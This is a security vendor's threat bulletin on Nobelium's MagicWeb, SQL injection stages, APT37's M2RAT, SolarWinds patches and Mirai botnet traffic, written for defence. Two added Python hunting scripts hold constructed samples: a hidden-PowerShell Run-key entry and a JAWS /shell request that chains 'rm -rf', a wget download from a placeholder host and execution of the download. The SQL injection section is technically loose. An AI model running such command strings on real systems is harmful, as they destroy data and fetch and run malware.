norm. threat bulletin: 08th March 2023


A deep dive into sophisticated tactics by Nobelium

Microsoft researchers recently provided insights into the Russia-linked Nobelium group’s threat ecosystem. The group, best known for the supply chain attack on SolarWinds, used a malicious tool, MagicWeb, for a sophisticated authentication bypass of Active Directory Federation Services (AD FS). The findings below reveal how they did it.

Nobelium used MagicWeb, an evolution of FoggyWeb, to implant a backdoor on the victim’s AD FS server. Nobelium accessed a vulnerable application through Azure AD App Proxy and then moved laterally to the AD FS servers using an AD privilege escalation vulnerability. It used a backdoor DLL with added .NET classes and static constructors and loaded it in the Global Assembly Cache (GAC), an obscure piece of .NET infrastructure. The loading into the AD FS process was made possible by editing a configuration file to specify a different public token. Additionally, the group utilised specially crafted, highly privileged certificates to bypass the normal authentication process and move laterally through the network.

Microsoft stated that it first spotted MagicWeb in August 2022, when one of its customers fell victim to a post-compromise capability of MagicWeb. In this case, Nobelium was using the tool to maintain persistent access to the customer’s environment. Microsoft’s Detection and Response Team (DART) performed various data-wrangling actions followed by in-depth data analysis to understand strange authentication requests. They found that the tool is capable of exfiltrating the configuration database of compromised AD FS servers, decrypting token-signing/decryption certificates, and obtaining additional payloads from its C2 server.

The group remains highly active with their tools, conducting multiple cyberattacks in parallel, predominantly targeting government organizations, NGOs, IGOs, and think tanks across the U.S., Europe, and Central Asia. By utilising multiple smartbloc. modules such as Threat Detection and Response, Vulnerability Patch Management and Cyber Safety and Awareness, you can be as protected as possible against the likes of Nobelium and their tools.

Breaking down the seven steps of an SQL Injection Attack

Cyberattacks can cause immense damage to an organisation’s systems and have only increased in frequency over recent years. SQL injection is an especially devastating example. This form of attack involves exploiting website or application code through the use of Structured Query Language (SQL). It is considered one of the most severe cyber threats, as it can give attackers access to sensitive data stored within databases and allow them to modify or delete data and even create new user accounts. With these capabilities, attackers can gain control of the entire system.

Much like other cyberattacks, malicious actors carry out SQL injection attacks in various stages across the attack life cycle. By breaking down each stage and understanding how it works, organisations can better protect themselves while also improving their overall cybersecurity posture.

  1. Reconnaissance – During the reconnaissance stage, attackers determine information about their targets, such as their weaknesses and vulnerabilities. During an SQL injection attack specifically, attackers use a wide variety of techniques to gain access to their target. Knowing the target’s weaknesses helps attackers focus their efforts to launch an effective attack faster and with less effort. Understanding what types of data are stored on a system or website will determine which type of malicious code attackers use against your system.
  2. Weaponization – The weaponization stage occurs after an attacker has identified and exploited a vulnerability in your system. SQL attackers craft malicious payloads explicitly tailored for your environment. These payloads aim to bypass your organisation’s security measures, gain access to sensitive information, or disrupt operations. Attackers may use automated tools such as Metasploit to generate these payloads quickly and easily. Additionally, attackers may use automated tools and data extraction methods such as SQLmap or XSS attacks to inject these payloads into your system.
  3. Delivery – The delivery stage involves sending malicious code or scripts to a targeted system to gain unauthorised access. These payloads include instructions for exploiting vulnerable web applications on the target system and gaining access to privileged information. The attacker may also use cross-site scripting (XSS) techniques to inject malicious code into web applications via client-side scripts such as JavaScript or HTML documents. This allows attackers to steal sensitive data, such as login credentials, by executing unauthorised commands on the server side of a website or application. During the delivery stages, attackers can modify existing application functions by manipulating user input before the server-side application accepts it.
  4. Exploitation – Once the attacker has gained access to a company’s system, they will begin exploiting its resources. Depending on what type of information they have obtained, they may take control of entire databases or even entire networks. The threats posed by SQL injection attacks are further exacerbated if the malicious actors can leverage stolen credentials on existing systems or databases to create new user accounts with full privileges. With unrestricted access, they can create new user accounts with privileged access rights or modify existing user accounts with elevated privileges.
  5. Installation – The installation stage occurs after the attacker successfully delivers the malicious payload to its target. During this phase, attackers will typically install backdoors on vulnerable systems to maintain access and execute additional commands without authorisation. Once the attacker has installed their backdoors, they will typically connect remotely and execute malicious commands without authorisation. If attackers can gain access to a system’s root directory, they can install any software of their choice and bypass most security measures.
  6. Command & Control – The command-and-control stage occurs after an attacker has gained access to a vulnerable system but has not yet launched their malicious payloads. During this stage, an attacker will establish persistent remote access and mechanisms to maintain control over the compromised system, even if it is rebooted or its connection to the internet drops out even temporarily. At this point, an attacker may also collect more information or deploy additional malicious files to aid in their mission.
  7. Actions on Objective – The actions on objective stage is the final stage of an SQL injection attack. During this stage, attackers will typically launch their malicious payloads and take whatever actions they desire. This may include accessing sensitive data, modifying existing configurations or executing malicious commands to gain further access to other systems in the network.

After this, the attackers will likely attempt to cover their tracks by deleting any evidence of their involvement. After completing their mission, they will typically disconnect from the remote access point and erase all traces of their activities, although it is not unheard of for attackers to leave a dormant connection to their C2 server to enable any future attack.

Implementing strong security measures, such as limiting access to privileged accounts, utilising norm.’s Vulnerability Patch Management module and regularly scanning for vulnerable systems, can help ensure that any attempt at an SQL injection attack is thwarted before it can do any significant damage.

RedEyes hackers use new malware to steal data from Windows

APT37, also known as ‘RedEyes’, is a North Korean cyber espionage hacking group believed to be state-supported. In 2022, the hacking group was seen exploiting Internet Explorer zero-days and distributing a wide assortment of malware against targeted entities and individuals. More recently, they have been observed using new evasive ‘M2RAT’ malware and steganography to target individuals for intelligence collection.

The recent attacks started in January 2023, when the hacking group sent phishing emails containing a malicious attachment to their targets. Opening the attachment triggers the exploitation of an old EPS vulnerability. The exploit causes shellcode to run on the victim’s computer, which downloads and executes malicious code stored within a JPEG image. This JPG image file uses steganography to stealthily introduce the M2RAT executable (“lskdjfei.exe”) onto the system and inject it into “explorer.exe”.

For persistence on the system, the malware adds a new value (“RyPO”) in the “Run” Registry key, with commands to execute a PowerShell script via “cmd.exe.” This same command was also seen in a 2021 Kaspersky report about APT37.
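The persistence described above can be hunted for in exported autorun data. The following is an added example, not code from the bulletin or from norm.: it assumes text output from `reg query` for the Run keys of both hives (the bulletin does not say which hive is used), and the sample output, including its command lines, is constructed.

```python
import re

# Constructed `reg query` output; the command lines are placeholders and
# are NOT the actual M2RAT command.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    RyPO    REG_SZ    c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -File C:\ProgramData\placeholder.ps1

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    Updater    REG_SZ    CMD.EXE /c "powershell -nop -w hidden -c <placeholder>"
"""

# `reg query` prints values as: 4 spaces, name, 4 spaces, type, 4 spaces, data.
VALUE_RE = re.compile(r"^\s{4}(?P<name>.+?)\s{4}(?P<type>REG_\w+)\s{4}(?P<data>.*)$")
KNOWN_VALUE_NAMES = {"rypo"}  # value name reported in the bulletin


def audit_run_keys(reg_query_output):
    """Return (key, value_name, reasons) for each Run value worth reviewing."""
    findings = []
    key = None
    for line in reg_query_output.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()
            continue
        m = VALUE_RE.match(line)
        if not m or key is None:
            continue
        data = m["data"].lower()
        reasons = []
        if m["name"].lower() in KNOWN_VALUE_NAMES:
            reasons.append("known value name")
        # Behavioural check: survives a renamed value, but can also match
        # legitimate admin scripts, so treat it as a review lead.
        if re.search(r"\bcmd(\.exe)?\b", data) and "powershell" in data:
            reasons.append("cmd.exe launching PowerShell")
        if reasons:
            findings.append((key, m["name"], reasons))
    return findings


if __name__ == "__main__":
    for key, name, reasons in audit_run_keys(SAMPLE_REG_QUERY):
        print(f"{key} -> {name}: {', '.join(reasons)}")
```
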

The M2RAT backdoor acts as a basic remote access trojan that performs keylogging, data theft, command execution, and the taking of screenshots from the desktop. The screenshot-snapping function is activated periodically and works autonomously without requiring a specific operator command.

The malware’s ability to scan for portable devices connected to the Windows computer, such as smartphones or tablets, is of particular interest. If a portable device is detected, it will scan the device’s contents for documents and voice recording files and, if found, copy them to the PC for exfiltration to the attacker’s server. Before exfiltration, the stolen data is compressed in a password-protected RAR archive, and the local copy is wiped from memory to eliminate any traces.

By utilising norm.’s Threat Detection & Response module in combination with the Vulnerability Patch Management module, your systems will receive the latest security updates, rendering attacks which utilise old vulnerabilities unsuccessful.

SolarWinds patches high severity vulnerabilities

Following an announcement earlier in the month, SolarWinds has published multiple advisories describing the high-severity vulnerabilities it has patched with a SolarWinds Platform update.

Out of a total of seven security defects, five are described as deserialization of untrusted data issues that could be exploited to achieve command execution. Four of them have a CVSS score of 8.8.

Tracked as CVE-2023-23836, CVE-2022-47503, CVE-2022-47504 and CVE-2022-47507, the high-severity flaws could allow “a remote adversary with Orion admin-level account access to the SolarWinds Web Console to execute arbitrary commands”, SolarWinds says. SolarWinds considers the fifth bug, which is tracked as CVE-2022-38111, a medium-severity issue, although the consequences of successful exploitation are the same. In addition, the flaw has a CVSS score of 7.2, which makes it ‘high severity’.

The company also announced patches for a high-severity path traversal vulnerability in the SolarWinds Platform, which is tracked as CVE-2022-47506 (CVSS score of 8.8). “This vulnerability allows a local adversary with authenticated account access to edit the default configuration, enabling the execution of arbitrary commands,” the company explains.

SolarWinds Platform 2023.1 resolves all vulnerabilities. By utilising norm.’s Vulnerability Patch Management module, customers can ensure they are protected against all the aforementioned vulnerabilities.

norm. observes increase of Mirai botnet traffic

norm. has been tracking an increase of Mirai botnet traffic across our customer estates over the last week. This IoT-based botnet, which first emerged in 2016, has been responsible for some of the largest DDoS (Distributed denial-of-service) attacks ever recorded, with a reported 380,000 to 400,000 infected devices at its peak [1][2]. The source code for the Mirai botnet was leaked in 2016 on Hackforums, which has led to several new variants of Mirai being seen in the wild [3].

Mirai serves two purposes after successfully infecting a target: perform discovery of IoT devices on the public internet and local networks and perform botnet functionality including DDoS attacks or bitcoin mining. Mirai usually targets DVR systems, routers, and CCTV systems.

norm. has seen Mirai targeting vulnerabilities within JAWS webserver, exploiting an HTTP request handling vulnerability to call back to an IP/domain hosting malware and other payloads. As an appendix to this week’s threat bulletin, you can find a series of IP addresses and domains that we have observed this week.
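A log-hunting sketch for the JAWS callback requests described above, added here as an example and not norm.’s own tooling. It assumes combined-format web access logs and a request to a `/shell` path whose query chains shell commands around a `wget`-style fetch; the sample lines and hosts (documentation address ranges and example.net) are constructed.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines; no host below is a real indicator.
SAMPLE_LOG = """\
198.51.100.7 - - [06/Mar/2023:10:01:02 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+203.0.113.9/jaws;sh+/tmp/jaws HTTP/1.1" 404 153
198.51.100.8 - - [06/Mar/2023:10:02:11 +0000] "GET /index.html HTTP/1.1" 200 5120
198.51.100.9 - - [06/Mar/2023:10:03:40 +0000] "GET /shell?cd+/tmp%3Bwget+http://files.example.net:8088/jaws%3Bsh+/tmp/jaws HTTP/1.1" 200 0
198.51.100.8 - - [06/Mar/2023:10:05:00 +0000] "GET /shell?help HTTP/1.1" 404 153
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')
# A download command followed by the host it would call back to.
FETCH_RE = re.compile(r"\b(?:wget|curl|tftp)\s+(?:https?://)?([^/\s;]+)", re.I)


def find_jaws_callbacks(log_text):
    """Return (client_ip, callback_host, status) per suspicious /shell request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, target, status = m.groups()
        # '+' stands for a space in the query; decode %xx so encoded
        # separators such as %3B cannot hide the command chain.
        decoded = unquote(target.replace("+", " "))
        path, _, query = decoded.partition("?")
        if path != "/shell":
            continue
        fetch = FETCH_RE.search(query)
        if fetch:
            hits.append((client, fetch.group(1), int(status)))
    return hits


def triage(hits):
    """Split hits into hosts to block at egress and requests a device answered."""
    callback_hosts = sorted({host for _, host, _ in hits})
    answered = [h for h in hits if h[2] == 200]  # device may have run the command
    return callback_hosts, answered


if __name__ == "__main__":
    hosts, answered = triage(find_jaws_callbacks(SAMPLE_LOG))
    print("callback hosts:", hosts)
    print("answered with 200:", answered)
```
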

Recommendations

Avoid the use of default credentials across all devices and accounts. Mirai uses credential dictionaries for default accounts to gain access to poorly secured devices.

Get on top of firmware upgrades and software updates – IoT devices can often be deployed and forgotten. Mirai has been seen to abuse hard-coded credentials or firmware bugs. Check if your device vendor has released any security advisories or patches recently. Vulnerability management platforms, such as Qualys, automatically pick up on said vulnerabilities.

Verify if your IoT devices face the public internet – Mirai uses SSH (22), Telnet (23) and HTTP/S (80/443) to spread and perform attacks. Assess whether your internal devices should have these ports open and whether blanket firewall rules to block inbound SSH/Telnet should be used.

Top sources of Mirai traffic:


Targeted URIs of customer endpoints:


URIs hosting Mirai payloads:


Sources

[1] Source Code for IoT Botnet ‘Mirai’ Released

[2] Mirai-Based Malware Continues to Dominate Botnet Variants, Report Finds

[3] Mirai Variant V3G4 Targets IoT Devices

